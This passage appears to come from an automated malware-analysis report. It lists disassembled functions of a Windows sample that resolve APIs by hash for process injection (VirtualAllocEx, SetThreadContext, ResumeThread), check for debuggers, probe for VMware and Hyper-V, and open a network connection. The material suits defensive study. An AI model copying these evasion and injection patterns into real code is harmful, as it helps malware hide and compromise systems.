004144BB mov edx, dword ptr [ebp+24h]
004144BE push edx
004144BF mov eax, dword ptr [ebp+20h]
004144C2 push eax
004144C3 mov ecx, dword ptr [ebp+1Ch]
004144C6 push ecx
004144C7 mov edx, dword ptr [ebp+18h]
004144CA push edx
004144CB mov eax, dword ptr [ebp+14h]
004144CE push eax
004144CF mov ecx, dword ptr [ebp+10h]
004144D2 push ecx
004144D3 mov edx, dword ptr [ebp+0Ch]
004144D6 push edx
004144D7 mov eax, dword ptr [ebp+08h]
004144DA push eax
004144DB push 6B5366BEh
004144E0 push 46318AC7h
004144E5 call 00415E40h
004144EA call eax CreateProcessA@KERNEL32.DLL (Hidden Import)
004144EC pop ebp
004144ED retn 0028h function end
Function 00413FF0, API count: 1, instr count: 18
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • WriteFile.KERNEL32, ref: 00414016
Address Instruction Meta Information
00413FF0 push ebp xrefs 00414763, 00413CAA, 00413CCB, 00413CEE, 00413D0C, 00413A97
00413FF1 mov ebp, esp
00413FF3 mov eax, dword ptr [ebp+18h]
00413FF6 push eax
00413FF7 mov ecx, dword ptr [ebp+14h]
00413FFA push ecx
00413FFB mov edx, dword ptr [ebp+10h]
00413FFE push edx
00413FFF mov eax, dword ptr [ebp+0Ch]
00414002 push eax
00414003 mov ecx, dword ptr [ebp+08h]
00414006 push ecx
00414007 push 6B5366BEh
0041400C push 0F3FD1C3h
00414011 call 00415E40h
00414016 call eax WriteFile@KERNEL32.DLL (Import)
00414018 pop ebp
00414019 retn 0014h function end
Function 00414180, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • Sleep.KERNEL32, ref: 00414196
Address Instruction Meta Information
00414180 push ebp xrefs 004153DD, 00413E24
00414181 mov ebp, esp
00414183 mov eax, dword ptr [ebp+08h]
00414186 push eax
00414187 push 6B5366BEh
0041418C push 3D9972F5h
00414191 call 00415E40h
00414196 call eax Sleep@KERNEL32.DLL (Hidden Import)
00414198 pop ebp
00414199 retn 0004h function end
Function 00413F90, API count: 1, instr count: 22
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateFileA.KERNEL32, ref: 00413FBE
Address Instruction Meta Information
00413F90 push ebp xrefs 0041473E, 00414D07, 004139CC, 00413A2D, 00413A57
00413F91 mov ebp, esp
00413F93 mov eax, dword ptr [ebp+20h]
00413F96 push eax
00413F97 mov ecx, dword ptr [ebp+1Ch]
00413F9A push ecx
00413F9B mov edx, dword ptr [ebp+18h]
00413F9E push edx
00413F9F mov eax, dword ptr [ebp+14h]
00413FA2 push eax
00413FA3 mov ecx, dword ptr [ebp+10h]
00413FA6 push ecx
00413FA7 mov edx, dword ptr [ebp+0Ch]
00413FAA push edx
00413FAB mov eax, dword ptr [ebp+08h]
00413FAE push eax
00413FAF push 6B5366BEh
00413FB4 push 08F8F114h
00413FB9 call 00415E40h
00413FBE call eax CreateFileA@KERNEL32.DLL (Import)
00413FC0 pop ebp
00413FC1 retn 001Ch function end
Function 004162FF, API count: 1, instr count: 13
APIs
  • ExitProcess.KERNEL32, ref: 0041632D
Address Instruction Meta Information
004162FF call 0041635Bh xrefs 004161EA
00416304 push 00000000h
00416306 push 00401090h
0041630B push 0040108Ch
00416310 call 00416334h
00416315 push 00000000h
00416317 push 00401098h
0041631C push 00401094h
00416321 call 00416334h
00416326 add esp, 18h
00416329 push dword ptr [esp+04h]
0041632D call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import)
00416333 int3
Function 00414BA0, API count: 10, instr count: 62
APIs
  • WSAStartup.WS2_32, ref: 00414BB5
  • WSASocketA.WS2_32, ref: 00414BC7
  • WSACleanup.WS2_32, ref: 00414BDC
  • gethostbyname.WS2_32, ref: 00414BEE
  • WSACleanup.WS2_32, ref: 00414C03
  • htons.WS2_32, ref: 00414C10
  • inet_ntoa.WS2_32, ref: 00414C37
  • inet_addr.WS2_32, ref: 00414C3E
  • WSAConnect.WS2_32, ref: 00414C62
  • WSACleanup.WS2_32, ref: 00414C6D
Address Instruction Meta Information
00414BA0 push ebp xrefs 00414DF0
00414BA1 mov ebp, esp
00414BA3 sub esp, 000001A8h
00414BA9 lea eax, dword ptr [ebp-00000190h]
00414BAF push eax
00414BB0 push 00000202h
00414BB5 call dword ptr [00401048h] WSAStartup@WS2_32.DLL (Import)
00414BBF push 00000000h Count = 3
00414BC1 push 00000006h
00414BC3 push 00000001h
00414BC5 push 00000002h
00414BC7 call dword ptr [00401068h] WSASocketA@WS2_32.DLL (Import)
00414BCD mov dword ptr [ebp-00000194h], eax
00414BD3 cmp dword ptr [ebp-00000194h], FFFFFFFFh
00414BDA jne 00414BEAh
00414BDC call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414BE2 or eax, FFFFFFFFh
00414BE5 jmp 00414C7Eh
00414BEA mov ecx, dword ptr [ebp+08h] xrefs 00414BDA
00414BED push ecx
00414BEE call dword ptr [00401060h] gethostbyname@WS2_32.DLL (Import)
00414BF4 mov dword ptr [ebp-00000198h], eax
00414BFA cmp dword ptr [ebp-00000198h], 00000000h
00414C01 jne 00414C0Eh
00414C03 call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414C09 or eax, FFFFFFFFh
00414C0C jmp 00414C7Eh
00414C0E push 00000050h xrefs 00414C01
00414C10 call dword ptr [00401054h] htons@WS2_32.DLL (Import)
00414C16 mov word ptr [ebp-000001A6h], ax
00414C1D mov edx, 00000002h
00414C22 mov word ptr [ebp-000001A8h], dx
00414C29 mov eax, dword ptr [ebp-00000198h]
00414C2F mov ecx, dword ptr [eax+0Ch]
00414C32 mov edx, dword ptr [ecx]
00414C34 mov eax, dword ptr [edx]
00414C36 push eax
00414C37 call dword ptr [00401044h] inet_ntoa@WS2_32.DLL (Import)
00414C3D push eax
00414C3E call dword ptr [0040104Ch] inet_addr@WS2_32.DLL (Import)
00414C44 mov dword ptr [ebp-000001A4h], eax
00414C50 push 00000000h Count = 4
00414C52 push 00000010h
00414C54 lea ecx, dword ptr [ebp-000001A8h]
00414C5A push ecx
00414C5B mov edx, dword ptr [ebp-00000194h]
00414C61 push edx
00414C62 call dword ptr [00401050h] WSAConnect@WS2_32.DLL (Import)
00414C68 cmp eax, FFFFFFFFh
00414C6B jne 00414C78h
00414C6D call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414C73 or eax, FFFFFFFFh
00414C76 jmp 00414C7Eh
00414C78 mov eax, dword ptr [ebp-00000194h] xrefs 00414C6B
00414C7E mov esp, ebp xrefs 00414C76, 00414C0C, 00414BE5
00414C80 pop ebp
00414C81 ret function end
Function 00414550, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • SetThreadContext.KERNEL32, ref: 0041456A
Address Instruction Meta Information
00414550 push ebp xrefs 00414407
00414551 mov ebp, esp
00414553 mov eax, dword ptr [ebp+0Ch]
00414556 push eax
00414557 mov ecx, dword ptr [ebp+08h]
0041455A push ecx
0041455B push 6B5366BEh
00414560 push AA1DC82Fh
00414565 call 00415E40h
0041456A call eax SetThreadContext@KERNEL32.DLL (Hidden Import)
0041456C pop ebp
0041456D retn 0008h function end
Function 00414110, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • SetCurrentDirectoryA.KERNEL32, ref: 00414126
Address Instruction Meta Information
00414110 push ebp xrefs 00413F16, 00413DA6, 00413DBA
00414111 mov ebp, esp
00414113 mov eax, dword ptr [ebp+08h]
00414116 push eax
00414117 push 6B5366BEh
0041411C push C807174Eh
00414121 call 00415E40h
00414126 call eax SetCurrentDirectoryA@KERNEL32.DLL (Hidden Import)
00414128 pop ebp
00414129 retn 0004h function end
Function 00414A00, API count: 1, instr count: 14
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • MoveFileExA.KERNEL32, ref: 00414A1E
Address Instruction Meta Information
00414A00 push ebp xrefs 0041461B
00414A01 mov ebp, esp
00414A03 mov eax, dword ptr [ebp+10h]
00414A06 push eax
00414A07 mov ecx, dword ptr [ebp+0Ch]
00414A0A push ecx
00414A0B mov edx, dword ptr [ebp+08h]
00414A0E push edx
00414A0F push 6B5366BEh
00414A14 push 3A7A7478h
00414A19 call 00415E40h
00414A1E call eax MoveFileExA@KERNEL32.DLL (Hidden Import)
00414A20 pop ebp
00414A21 retn 000Ch function end
Function 00412250, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CheckRemoteDebuggerPresent.KERNEL32, ref: 0041226A
Address Instruction Meta Information
00412250 push ebp xrefs 004121A3
00412251 mov ebp, esp
00412253 mov eax, dword ptr [ebp+0Ch]
00412256 push eax
00412257 mov ecx, dword ptr [ebp+08h]
0041225A push ecx
0041225B push 6B5366BEh
00412260 push 6D3A8272h
00412265 call 00415E40h
0041226A call eax CheckRemoteDebuggerPresent@KERNEL32.DLL (Hidden Import)
0041226C pop ebp
0041226D retn 0008h function end
Function 004144F0, API count: 1, instr count: 18
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • VirtualAllocEx.KERNEL32, ref: 00414516
Address Instruction Meta Information
004144F0 push ebp xrefs 00414329, 004151A5
004144F1 mov ebp, esp
004144F3 mov eax, dword ptr [ebp+18h]
004144F6 push eax
004144F7 mov ecx, dword ptr [ebp+14h]
004144FA push ecx
004144FB mov edx, dword ptr [ebp+10h]
004144FE push edx
004144FF mov eax, dword ptr [ebp+0Ch]
00414502 push eax
00414503 mov ecx, dword ptr [ebp+08h]
00414506 push ecx
00414507 push 6B5366BEh
0041450C push 9ABFB8A6h
00414511 call 00415E40h
00414516 call eax VirtualAllocEx@KERNEL32.DLL (Hidden Import)
00414518 pop ebp
00414519 retn 0014h function end
Function 00414570, API count: 1, instr count: 10
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • ResumeThread.KERNEL32, ref: 00414586
Address Instruction Meta Information
00414570 push ebp xrefs 00414410
00414571 mov ebp, esp
00414573 mov eax, dword ptr [ebp+08h]
00414576 push eax
00414577 push 6B5366BEh
0041457C push 7B88BF3Bh
00414581 call 00415E40h
00414586 call eax ResumeThread@KERNEL32.DLL (Hidden Import)
00414588 pop ebp
00414589 retn 0004h function end
Function 00414B80, API count: 1, instr count: 13
APIs
  • InternetGetConnectedState.WININET, ref: 00414B8A
Address Instruction Meta Information
00414B80 push ebp xrefs 0041493D
00414B81 mov ebp, esp
00414B83 push ecx
00414B84 push 00000000h
00414B86 lea eax, dword ptr [ebp-04h]
00414B89 push eax
00414B8A call dword ptr [0040103Ch] InternetGetConnectedState@WININET.DLL (Import)
00414B90 neg eax
00414B92 sbb eax, eax
00414B94 neg eax
00414B96 mov esp, ebp
00414B98 pop ebp
00414B99 ret function end
Function 004136A0, API count: 1, instr count: 12
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateToolhelp32Snapshot.KERNEL32, ref: 004136BA
Address Instruction Meta Information
004136A0 push ebp xrefs 004133A7
004136A1 mov ebp, esp
004136A3 mov eax, dword ptr [ebp+0Ch]
004136A6 push eax
004136A7 mov ecx, dword ptr [ebp+08h]
004136AA push ecx
004136AB push 6B5366BEh
004136B0 push 5BC1D14Fh
004136B5 call 00415E40h
004136BA call eax CreateToolhelp32Snapshot@KERNEL32.DLL (Hidden Import)
004136BC pop ebp
004136BD retn 0008h function end
Function 004137B0, API count: 1, instr count: 20
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegQueryValueExA.ADVAPI32, ref: 004137DA
Address Instruction Meta Information
004137B0 push ebp xrefs 004135C1
004137B1 mov ebp, esp
004137B3 mov eax, dword ptr [ebp+1Ch]
004137B6 push eax
004137B7 mov ecx, dword ptr [ebp+18h]
004137BA push ecx
004137BB mov edx, dword ptr [ebp+14h]
004137BE push edx
004137BF mov eax, dword ptr [ebp+10h]
004137C2 push eax
004137C3 mov ecx, dword ptr [ebp+0Ch]
004137C6 push ecx
004137C7 mov edx, dword ptr [ebp+08h]
004137CA push edx
004137CB push 647832FCh
004137D0 push 1802E7C8h
004137D5 call 00415E40h
004137DA call eax RegQueryValueExA@ADVAPI32.DLL (Hidden Import)
004137DC pop ebp
004137DD retn 0018h function end
Non-executed Functions
Function 00412540, API count: 0, instr count: 163
Strings
  • vmwareuser.exe, va: 00411E44
  • vmwaretray.exe, va: 00411E54
  • SYSTEM\ControlSet001\Services, va: 00411E64
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0, va: 00411E88
  • vmdebug, va: 00411ED8
  • vmmouse, va: 00411EE0
  • VMTools, va: 00411EE8
  • VMMEMCTL, va: 00411EF0
  • vmware, va: 00411EFC
  • Identifier, va: 00411F04
Address Instruction Meta Information
00412540 push ebp xrefs 004147FA
00412541 mov ebp, esp
00412543 sub esp, 0000029Ch
00412549 push esi
0041254A push edi
0041254B mov eax, dword ptr [00411E44h] ASCII "vmwareuser.exe"
00412550 mov dword ptr [ebp-00000294h], eax
00412556 mov ecx, dword ptr [00411E48h] 73756572
0041255C mov dword ptr [ebp-00000290h], ecx
00412562 mov edx, dword ptr [00411E4Ch] 652E7265
00412568 mov dword ptr [ebp-0000028Ch], edx
0041256E mov ax, word ptr [00411E50h] 6578
00412574 mov word ptr [ebp-00000288h], ax
0041257B mov cl, byte ptr [00411E52h] 00
00412581 mov byte ptr [ebp-00000286h], cl
00412587 xor edx, edx
00412589 mov dword ptr [ebp-00000285h], edx
0041258F mov byte ptr [ebp-00000281h], dl
00412595 mov eax, dword ptr [00411E54h] ASCII "vmwaretray.exe"
0041259A mov dword ptr [ebp-00000280h], eax
004125A0 mov ecx, dword ptr [00411E58h] 72746572
004125A6 mov dword ptr [ebp-0000027Ch], ecx
004125AC mov edx, dword ptr [00411E5Ch] 652E7961
004125B2 mov dword ptr [ebp-00000278h], edx
004125B8 mov ax, word ptr [00411E60h] 6578
004125BE mov word ptr [ebp-00000274h], ax
004125C5 mov cl, byte ptr [00411E62h] 00
004125CB mov byte ptr [ebp-00000272h], cl
004125D1 xor edx, edx
004125D3 mov dword ptr [ebp-00000271h], edx
004125D9 mov byte ptr [ebp-0000026Dh], dl
004125DF xor eax, eax
004125E1 mov word ptr [ebp-04h], ax
004125E5 jmp 004125F3h
004125E7 mov cx, word ptr [ebp-04h] xrefs 00412621
004125EB add cx, 0001h
004125EF mov word ptr [ebp-04h], cx
004125F3 movzx edx, word ptr [ebp-04h] xrefs 004125E5
004125F7 cmp edx, 02h
004125FA jnl 00412623h
004125FC movzx eax, word ptr [ebp-04h]
00412600 imul eax, eax, 14h
00412603 lea ecx, dword ptr [ebp+eax-00000294h]
0041260A push ecx
0041260B call 00413380h
00412610 add esp, 04h
00412613 movzx edx, al
00412616 test edx, edx
00412618 je 00412621h
0041261A mov al, 01h
0041261C jmp 004127D4h
00412621 jmp 004125E7h xrefs 00412618
00412623 mov ecx, 00000007h xrefs 004125FA
00412628 mov esi, 00411E64h ASCII "SYSTEM\ControlSet001\Services"
0041262D lea edi, dword ptr [ebp-00000260h]
00412633 rep movsd
00412635 movsw
00412637 push 00000046h
00412639 push 00000000h
0041263B lea eax, dword ptr [ebp-00000242h]
00412641 push eax
00412642 call 00415F8Fh
00412647 add esp, 0Ch
0041264A mov ecx, 00000013h
0041264F mov esi, 00411E88h ASCII "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"
00412654 lea edi, dword ptr [ebp-000001FCh]
0041265A rep movsd
0041265C movsb
0041265D xor ecx, ecx
0041265F mov dword ptr [ebp-000001AFh], ecx
00412665 mov dword ptr [ebp-000001ABh], ecx
0041266B mov dword ptr [ebp-000001A7h], ecx
00412671 mov dword ptr [ebp-000001A3h], ecx
00412677 mov dword ptr [ebp-0000019Fh], ecx
0041267D mov word ptr [ebp-0000019Bh], cx
00412684 mov byte ptr [ebp-00000199h], cl
0041268A mov edx, dword ptr [00411ED8h] ASCII "vmdebug"
00412690 mov dword ptr [ebp-00000198h], edx
00412696 mov eax, dword ptr [00411EDCh] 00677562
0041269B mov dword ptr [ebp-00000194h], eax
004126A1 push 0000005Ch
004126A3 push 00000000h
004126A5 lea ecx, dword ptr [ebp-00000190h]
004126AB push ecx
004126AC call 00415F8Fh
004126B1 add esp, 0Ch
004126B4 mov edx, dword ptr [00411EE0h] ASCII "vmmouse"
004126BA mov dword ptr [ebp-00000134h], edx
004126C0 mov eax, dword ptr [00411EE4h] 00657375
004126C5 mov dword ptr [ebp-00000130h], eax
004126CB push 0000005Ch
004126CD push 00000000h
004126CF lea ecx, dword ptr [ebp-0000012Ch]
004126D5 push ecx
004126D6 call 00415F8Fh
004126DB add esp, 0Ch
004126DE mov edx, dword ptr [00411EE8h] ASCII "VMTools"
004126E4 mov dword ptr [ebp-000000D0h], edx
004126EA mov eax, dword ptr [00411EECh] 00736C6F
004126EF mov dword ptr [ebp-000000CCh], eax
004126F5 push 0000005Ch
004126F7 push 00000000h
004126F9 lea ecx, dword ptr [ebp-000000C8h]
004126FF push ecx
00412700 call 00415F8Fh
00412705 add esp, 0Ch
00412708 mov edx, dword ptr [00411EF0h] ASCII "VMMEMCTL"
0041270E mov dword ptr [ebp-6Ch], edx
00412711 mov eax, dword ptr [00411EF4h] 4C54434D
00412716 mov dword ptr [ebp-68h], eax
00412719 mov cl, byte ptr [00411EF8h] 00
0041271F mov byte ptr [ebp-64h], cl
00412722 push 0000005Bh
00412724 push 00000000h
00412726 lea edx, dword ptr [ebp-63h]
00412729 push edx
0041272A call 00415F8Fh
0041272F add esp, 0Ch
00412732 push 00000004h
00412734 lea eax, dword ptr [ebp-00000198h]
0041273A push eax
0041273B lea ecx, dword ptr [ebp-00000260h]
00412741 push ecx
00412742 call 00413450h
00412747 add esp, 0Ch
0041274A movzx edx, al
0041274D test edx, edx
0041274F je 00412755h
00412751 mov al, 01h
00412753 jmp 004127D4h
00412755 mov eax, dword ptr [00411EFCh] ASCII "vmware" xrefs 0041274F
0041275A mov dword ptr [ebp-0000029Ch], eax
00412760 mov cx, word ptr [00411F00h] 6572
00412767 mov word ptr [ebp-00000298h], cx
0041276E mov dl, byte ptr [00411F02h] 00
00412774 mov byte ptr [ebp-00000296h], dl
0041277A mov eax, dword ptr [00411F04h] ASCII "Identifier"
0041277F mov dword ptr [ebp-0000026Ch], eax
00412785 mov ecx, dword ptr [00411F08h] 69666974
0041278B mov dword ptr [ebp-00000268h], ecx
00412791 mov dx, word ptr [00411F0Ch] 7265
00412798 mov word ptr [ebp-00000264h], dx
0041279F mov al, byte ptr [00411F0Eh] 00
004127A4 mov byte ptr [ebp-00000262h], al
004127AA lea ecx, dword ptr [ebp-0000029Ch]
004127B0 push ecx
004127B1 lea edx, dword ptr [ebp-0000026Ch]
004127B7 push edx
004127B8 lea eax, dword ptr [ebp-000001FCh]
004127BE push eax
004127BF call 00413560h
004127C4 add esp, 0Ch
004127C7 movzx ecx, al
004127CA test ecx, ecx
004127CC je 004127D2h
004127CE mov al, 01h
004127D0 jmp 004127D4h
004127D2 xor al, al xrefs 004127CC
004127D4 pop edi xrefs 004127D0, 00412753, 0041261C
004127D5 pop esi
004127D6 mov esp, ebp
004127D8 pop ebp
004127D9 ret function end
Function 004122B0, API count: 0, instr count: 160
Strings
  • SOFTWARE\Microsoft, va: 00411DC0
  • SYSTEM\ControlSet001\Services, va: 00411DD4
  • Hyper-V, va: 00411DF4
  • VirtualMachine, va: 00411DFC
  • vmicheartbeat, va: 00411E0C
  • vmicvss, va: 00411E1C
  • vmicshutdown, va: 00411E24
  • vmicexchange, va: 00411E34
Address Instruction Meta Information
004122B0 push ebp xrefs 004147EE
004122B1 mov ebp, esp
004122B3 sub esp, 000003F0h
004122B9 push esi
004122BA push edi
004122BB mov eax, dword ptr [00411DC0h] ASCII "SOFTWARE\Microsoft"
004122C0 mov dword ptr [ebp-000003F0h], eax
004122C6 mov ecx, dword ptr [00411DC4h] 45524157
004122CC mov dword ptr [ebp-000003ECh], ecx
004122D2 mov edx, dword ptr [00411DC8h] 63694D5C
004122D8 mov dword ptr [ebp-000003E8h], edx
004122DE mov eax, dword ptr [00411DCCh] 6F736F72
004122E3 mov dword ptr [ebp-000003E4h], eax
004122E9 mov cx, word ptr [00411DD0h] 7466
004122F0 mov word ptr [ebp-000003E0h], cx
004122F7 mov dl, byte ptr [00411DD2h] 00
004122FD mov byte ptr [ebp-000003DEh], dl
00412303 push 00000051h
00412305 push 00000000h
00412307 lea eax, dword ptr [ebp-000003DDh]
0041230D push eax
0041230E call 00415F8Fh
00412313 add esp, 0Ch
00412316 mov ecx, 00000007h
0041231B mov esi, 00411DD4h ASCII "SYSTEM\ControlSet001\Services"
00412320 lea edi, dword ptr [ebp-0000038Ch]
00412326 rep movsd
00412328 movsw
0041232A push 00000046h
0041232C push 00000000h
0041232E lea ecx, dword ptr [ebp-0000036Eh]
00412334 push ecx
00412335 call 00415F8Fh
0041233A add esp, 0Ch
0041233D mov edx, dword ptr [00411DF4h] ASCII "Hyper-V"
00412343 mov dword ptr [ebp-00000328h], edx
00412349 mov eax, dword ptr [00411DF8h] 00562D72
0041234E mov dword ptr [ebp-00000324h], eax
00412354 push 0000005Ch
00412356 push 00000000h
00412358 lea ecx, dword ptr [ebp-00000320h]
0041235E push ecx
0041235F call 00415F8Fh
00412364 add esp, 0Ch
00412367 mov edx, dword ptr [00411DFCh] ASCII "VirtualMachine"
0041236D mov dword ptr [ebp-000002C4h], edx
00412373 mov eax, dword ptr [00411E00h] 4D6C6175
00412378 mov dword ptr [ebp-000002C0h], eax
0041237E mov ecx, dword ptr [00411E04h] 69686361
00412384 mov dword ptr [ebp-000002BCh], ecx
0041238A mov dx, word ptr [00411E08h] 656E
00412391 mov word ptr [ebp-000002B8h], dx
00412398 mov al, byte ptr [00411E0Ah] 00
0041239D mov byte ptr [ebp-000002B6h], al
004123A3 push 00000055h
004123A5 push 00000000h
004123A7 lea ecx, dword ptr [ebp-000002B5h]
004123AD push ecx
004123AE call 00415F8Fh
004123B3 add esp, 0Ch
004123B6 mov dl, byte ptr [0041198Bh] 00
004123BC mov byte ptr [ebp-00000260h], dl
004123C2 push 00000063h
004123C4 push 00000000h
004123C6 lea eax, dword ptr [ebp-0000025Fh]
004123CC push eax
004123CD call 00415F8Fh
004123D2 add esp, 0Ch
004123D5 mov cl, byte ptr [0041198Fh] 00
004123DB mov byte ptr [ebp-000001FCh], cl
004123E1 push 00000063h
004123E3 push 00000000h
004123E5 lea edx, dword ptr [ebp-000001FBh]
004123EB push edx
004123EC call 00415F8Fh
004123F1 add esp, 0Ch
004123F4 mov eax, dword ptr [00411E0Ch] ASCII "vmicheartbeat"
004123F9 mov dword ptr [ebp-00000198h], eax
004123FF mov ecx, dword ptr [00411E10h] 72616568
00412405 mov dword ptr [ebp-00000194h], ecx
0041240B mov edx, dword ptr [00411E14h] 61656274
00412411 mov dword ptr [ebp-00000190h], edx
00412417 mov ax, word ptr [00411E18h] 0074
0041241D mov word ptr [ebp-0000018Ch], ax
00412424 push 00000056h
00412426 push 00000000h
00412428 lea ecx, dword ptr [ebp-0000018Ah]
0041242E push ecx
0041242F call 00415F8Fh
00412434 add esp, 0Ch
00412437 mov edx, dword ptr [00411E1Ch] ASCII "vmicvss"
0041243D mov dword ptr [ebp-00000134h], edx
00412443 mov eax, dword ptr [00411E20h] 00737376
00412448 mov dword ptr [ebp-00000130h], eax
0041244E push 0000005Ch
00412450 push 00000000h
00412452 lea ecx, dword ptr [ebp-0000012Ch]
00412458 push ecx
00412459 call 00415F8Fh
0041245E add esp, 0Ch
00412461 mov edx, dword ptr [00411E24h] ASCII "vmicshutdown"
00412467 mov dword ptr [ebp-000000D0h], edx
0041246D mov eax, dword ptr [00411E28h] 74756873
00412472 mov dword ptr [ebp-000000CCh], eax
00412478 mov ecx, dword ptr [00411E2Ch] 6E776F64
0041247E mov dword ptr [ebp-000000C8h], ecx
00412484 mov dl, byte ptr [00411E30h] 00
0041248A mov byte ptr [ebp-000000C4h], dl
00412490 push 00000057h
00412492 push 00000000h
00412494 lea eax, dword ptr [ebp-000000C3h]
0041249A push eax
0041249B call 00415F8Fh
004124A0 add esp, 0Ch
004124A3 mov ecx, dword ptr [00411E34h] ASCII "vmicexchange"
004124A9 mov dword ptr [ebp-6Ch], ecx
004124AC mov edx, dword ptr [00411E38h] 68637865
004124B2 mov dword ptr [ebp-68h], edx
004124B5 mov eax, dword ptr [00411E3Ch] 65676E61
004124BA mov dword ptr [ebp-64h], eax
004124BD mov cl, byte ptr [00411E40h] 00
004124C3 mov byte ptr [ebp-60h], cl
004124C6 push 00000057h
004124C8 push 00000000h
004124CA lea edx, dword ptr [ebp-5Fh]
004124CD push edx
004124CE call 00415F8Fh
004124D3 add esp, 0Ch
004124D6 xor eax, eax
004124D8 mov word ptr [ebp-04h], ax
004124DC jmp 004124EAh
004124DE mov cx, word ptr [ebp-04h] xrefs 00412529
004124E2 add cx, 0001h
004124E6 mov word ptr [ebp-04h], cx
004124EA movzx edx, word ptr [ebp-04h] xrefs 004124DC
004124EE cmp edx, 02h
004124F1 jnl 0041252Bh
004124F3 push 00000004h
004124F5 movzx eax, word ptr [ebp-04h]
004124F9 imul eax, eax, 00000190h
004124FF lea ecx, dword ptr [ebp+eax-00000328h]
00412506 push ecx
00412507 movzx edx, word ptr [ebp-04h]
0041250B imul edx, edx, 64h
0041250E lea eax, dword ptr [ebp+edx-000003F0h]
00412515 push eax
00412516 call 00413450h
0041251B add esp, 0Ch
0041251E movzx ecx, al
00412521 test ecx, ecx
00412523 je 00412529h
00412525 mov al, 01h
00412527 jmp 0041252Dh
00412529 jmp 004124DEh xrefs 00412523
0041252B xor al, al xrefs 004124F1
0041252D pop edi xrefs 00412527
0041252E pop esi
0041252F mov esp, ebp
00412531 pop ebp
00412532 ret function end
Function 00413380, API count: 0, instr count: 70
Address Instruction Meta Information
00413380 push ebp xrefs 0041260B, 0041288D, 00412F0F, 00412F7E
00413381 mov ebp, esp
00413383 sub esp, 00000198h
00413389 mov dword ptr [ebp-00000178h], 00000128h
00413393 mov eax, dword ptr [ebp+08h]
00413396 push eax
00413397 call 00415EDCh
0041339C add esp, 04h
0041339F mov word ptr [ebp-08h], ax
004133A3 push 00000000h
004133A5 push 00000002h
004133A7 call 004136A0h
004133AC mov dword ptr [ebp-04h], eax
004133AF mov cl, byte ptr [00411987h] 00
004133B5 mov byte ptr [ebp-70h], cl
004133B8 push 00000063h
004133BA push 00000000h
004133BC lea edx, dword ptr [ebp-6Fh]
004133BF push edx
004133C0 call 00415F8Fh
004133C5 add esp, 0Ch
004133C8 mov eax, dword ptr [ebp+08h]
004133CB push eax
004133CC call 00413330h
004133D1 add esp, 04h
004133D4 lea ecx, dword ptr [ebp-00000198h]
004133DA push ecx
004133DB mov edx, dword ptr [ebp-04h]
004133DE push edx
004133DF call 004136C0h
004133E4 test eax, eax
004133E6 je 0041343Eh
004133E8 lea eax, dword ptr [ebp-00000198h] xrefs 0041343C
004133EE push eax
004133EF mov ecx, dword ptr [ebp-04h]
004133F2 push ecx
004133F3 call 004136E0h
004133F8 test eax, eax
004133FA je 0041343Eh
004133FC lea edx, dword ptr [ebp-00000174h]
00413402 push edx
00413403 lea eax, dword ptr [ebp-70h]
00413406 push eax
00413407 call 00415EECh
0041340C add esp, 08h
0041340F mov byte ptr [ebp-0Dh], 00000000h
00413413 lea ecx, dword ptr [ebp-70h]
00413416 push ecx
00413417 call 00413330h
0041341C add esp, 04h
0041341F movzx edx, word ptr [ebp-08h]
00413423 push edx
00413424 lea eax, dword ptr [ebp-70h]
00413427 push eax
00413428 mov ecx, dword ptr [ebp+08h]
0041342B push ecx
0041342C call 00415EABh
00413431 add esp, 0Ch
00413434 test eax, eax
00413436 jne 0041343Ch
00413438 mov al, 01h
0041343A jmp 00413449h
0041343C jmp 004133E8h xrefs 00413436
0041343E mov edx, dword ptr [ebp-04h] xrefs 004133E6, 004133FA
00413441 push edx
00413442 call 00413700h
00413447 xor al, al
00413449 mov esp, ebp xrefs 0041343A
0041344B pop ebp
0041344C ret function end
Function 00413560, API count: 0, instr count: 89
Address Instruction Meta Information
00413560 push ebp xrefs 004127BF, 00412ECE
00413561 mov ebp, esp
00413563 sub esp, 00000408h
00413569 mov dword ptr [ebp-00000204h], 000001F4h
00413573 mov dword ptr [ebp-00000404h], 00000001h
0041357D mov dword ptr [ebp-08h], 00000000h
00413584 lea eax, dword ptr [ebp-04h]
00413587 push eax
00413588 push 00000001h
0041358A push 00000000h
0041358C mov ecx, dword ptr [ebp+08h]
0041358F push ecx
00413590 push 80000002h
00413595 call 00413720h
0041359A test eax, eax
0041359C jne 0041368Dh
004135A2 lea edx, dword ptr [ebp-00000204h]
004135A8 push edx
004135A9 lea eax, dword ptr [ebp-00000200h]
004135AF push eax
004135B0 lea ecx, dword ptr [ebp-00000404h]
004135B6 push ecx
004135B7 push 00000000h
004135B9 mov edx, dword ptr [ebp+0Ch]
004135BC push edx
004135BD mov eax, dword ptr [ebp-04h]
004135C0 push eax
004135C1 call 004137B0h
004135C6 mov dword ptr [ebp-00000408h], eax
004135CC cmp dword ptr [ebp-00000408h], 00000000h
004135D3 jne 00413680h
004135D9 mov ecx, dword ptr [ebp-04h]
004135DC push ecx
004135DD call 00413790h
004135E2 lea edx, dword ptr [ebp-00000200h]
004135E8 push edx
004135E9 lea eax, dword ptr [ebp-00000400h]
004135EF push eax
004135F0 call 00415EECh
004135F5 add esp, 08h
004135F8 mov ecx, dword ptr [ebp+10h]
004135FB push ecx
004135FC call 00413330h
00413601 add esp, 04h
00413604 lea edx, dword ptr [ebp-00000400h]
0041360A push edx
0041360B call 00413330h
